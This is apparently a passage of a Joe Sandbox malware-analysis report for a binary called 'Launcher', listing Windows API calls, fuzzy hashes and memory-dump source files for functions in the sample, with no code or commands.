                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                            • Opcode ID: 2af63e6e689bbef2802ca5fa514c24a897cf1a36f8dd3e61d663baf27b142ce4
                                                                                                                                                                                                                                                            • Instruction ID: bef14e51aecc03159e774ad9f6ba15c47e1bad150c848acee04404e089b1e60e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2af63e6e689bbef2802ca5fa514c24a897cf1a36f8dd3e61d663baf27b142ce4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7E06C3228515257D7222767DD00B5F3A4CAFC27A0F155111BE15A61E0FEA0DC519591
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 009D0521
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                                                                                                                                            • Opcode ID: e661e17063f482c27c2836dd3bd1e7e1a569301e29a1a9b0824203d682e51f04
                                                                                                                                                                                                                                                            • Instruction ID: 829168931f45085b5e530aa9671f893cae440c979682691f45629e1f8b103b9c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e661e17063f482c27c2836dd3bd1e7e1a569301e29a1a9b0824203d682e51f04
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAE04F70C4020CABCB04EFB5E142A6EB7B8AFC0310F1080AEE84967351DB359E04CF42
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 009CBA01
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                                                                                                                                            • Opcode ID: d54092ffe385f37bf38e100b09a46dbf490ab7c81b07d1c2ddcf268f775d5759
                                                                                                                                                                                                                                                            • Instruction ID: cb80712c288e855e7f60391e699024d71910ce4da96f452cc7dcdb2025421e19
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d54092ffe385f37bf38e100b09a46dbf490ab7c81b07d1c2ddcf268f775d5759
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1E0BF70D4420CABCB04EFA4E156B9DB7B9AF84314F5040ADE85A67361DB325E54CB46
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$A2sx
                                                                                                                                                                                                                                                            • API String ID: 4168288129-681800871
                                                                                                                                                                                                                                                            • Opcode ID: eb1d1e52c1fe017be047273e60930cd71835b0e0949b607f5b5fff31965d6347
                                                                                                                                                                                                                                                            • Instruction ID: 938e35732c0f3a5975896be5a82d8326d1855898fd913fb7f85efe301ebc7828
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1d1e52c1fe017be047273e60930cd71835b0e0949b607f5b5fff31965d6347
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FED23BB1E082698FDB66CE29CD407EAB7B9FB44305F1445EAD44DE7240E778AE818F41
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: GetLastError.KERNEL32(00000000,?,009E2A49), ref: 009E0717
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: SetLastError.KERNEL32(00000000,?,?,00000028,009DD2C9), ref: 009E07B9
                                                                                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 009E5776
                                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 009E57B4
                                                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 009E57C7
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 009E580F
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 009E582A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 415426439-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 986e1f9ce4d0425527b70d1b0df8e090adb4d60397afa8ec48924ab4d90613f1
                                                                                                                                                                                                                                                            • Instruction ID: bd5698964cf3988cc43bdff648a88f359ec0be9c7750622f0f8d77a97ecae532
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 986e1f9ce4d0425527b70d1b0df8e090adb4d60397afa8ec48924ab4d90613f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20518B71A00689EFDB12DFA6CC41BBE77BCAF44708F1A4429E901E7190EB719E40CB61
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009E64A5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 1974802433-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: d5c3ebf1dd59309feca671f4f9dd132f51a08d4309cafb8159a4ec2316743679
                                                                                                                                                                                                                                                            • Instruction ID: 99d14a8ba53f8869418eff1bccc803d28102cd8b78f7205c169ccf2f08a7d5eb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5c3ebf1dd59309feca671f4f9dd132f51a08d4309cafb8159a4ec2316743679
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 047108B1905198AFDF22AF29CC89BBEBBB8AB55344F1441D9F04893251EB319E84DF10
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,009E57A4,00000002,00000000,?,?,?,009E57A4,?,00000000), ref: 009E5E6C
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,009E57A4,00000002,00000000,?,?,?,009E57A4,?,00000000), ref: 009E5E95
                                                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,009E57A4,?,00000000), ref: 009E5EAA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                            • Opcode ID: e1c6867f7cbd38a0fb04bc4a20283524eef0c2f439005c77f9590616a6bf1d27
                                                                                                                                                                                                                                                            • Instruction ID: c0e8b540184ba367c9613838834b3efcde594ae1154d63320a40e6d45a0ec0f8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1c6867f7cbd38a0fb04bc4a20283524eef0c2f439005c77f9590616a6bf1d27
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3221A771600980BAD7369F56C904AA773AAEB54F5CB57442CE90ADB110E732EF40C790
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: GetLastError.KERNEL32(00000000,?,009E2A49), ref: 009E0717
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: SetLastError.KERNEL32(00000000,?,?,00000028,009DD2C9), ref: 009E07B9
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009E59AE
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009E59F8
                                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009E5ABE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 661929714-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 1f3805dd78c025a0a8847129b97fa2c52db86665d607de0179269c5310b90be8
                                                                                                                                                                                                                                                            • Instruction ID: 26c75304acd3d56eccae42cbaf54cdcb15f42103b345a2c00f86bb6fd8c79634
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f3805dd78c025a0a8847129b97fa2c52db86665d607de0179269c5310b90be8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2061CE71910A47AFDB2A9F2ACCC2BBA77A8FF44318F1541B9E905C6285E774DD80CB50
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 009DCEA8
                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 009DCEB2
                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 009DCEBF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 3906539128-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 3bc9795e3c52c77805493bf745a77180acd87c3fd42614609e8d084830303acf
                                                                                                                                                                                                                                                            • Instruction ID: a484055871e5ae04dd4a6266fd9f99fec66f11954d26dfbddbaa76de2bd2d3bf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bc9795e3c52c77805493bf745a77180acd87c3fd42614609e8d084830303acf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A31C2B59512189BCB21DF28D88879DBBB8BF08310F5081EAE41CA7250E7709F85DF44
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 940c0e5d6642d71f3349d6853f9f47a4d852d201499cf18fcd482ab34cbb11e5
                                                                                                                                                                                                                                                            • Instruction ID: 65e5a5fd77abd21204b68cec5bfc0713a6bf9a1d10fed02871dedbba1fbb0c74
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 940c0e5d6642d71f3349d6853f9f47a4d852d201499cf18fcd482ab34cbb11e5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9024B71E412199FDF14DFA9C9807AEBBF5FF88314F24826AD519AB380D731A941CB90
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 009D407F
                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 009D414B
                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009D4164
                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 009D416E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                                                                                            • Opcode ID: 7de76a538461527e0d0a0df1e98f272f5729f82bba856ecb19a69af71e5f86d3
                                                                                                                                                                                                                                                            • Instruction ID: 15798c227de34dde0d7d0216782f3c110f0bc5655b87df93aec1cc9d39a366d9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7de76a538461527e0d0a0df1e98f272f5729f82bba856ecb19a69af71e5f86d3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E43108B5D452189BDF20DFA4D9497CDBBB8EF18300F1081AAE50CAB250EB719B84DF45
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,009D3918,009D386B,?,?,?,?,009D386B,?,00000000,?,009CB20C,?,?,009CD57E), ref: 009D4827
                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,78733241,?,?,009F0227,000000FF,?,009D4534,?,?,?,?,009D4558,00000000,?), ref: 009D482B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Time$FileSystem$Precise
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 743729956-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: a7c398bd0b2190db57083eb9474d117bc33026a55a4685128aa978fd7ae3be29
                                                                                                                                                                                                                                                            • Instruction ID: 8f04c77b002634f6664a2bc87b64fca3f4b4053f83ae3897940b15ba0acebd00
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7c398bd0b2190db57083eb9474d117bc33026a55a4685128aa978fd7ae3be29
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21F0E572A5C558EFC7019F44EC45BADB7A8F708B20F00422AE812D37A0CB356800EB90
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E1797: HeapAlloc.KERNEL32(00000008,00001000,?,?,009E08B1,00000001,00000364,?,00000006,000000FF,?,?,009DC669,009E0504), ref: 009E17D8
                                                                                                                                                                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009E64A5
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 009E6599
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 009E65D8
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 009E660B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
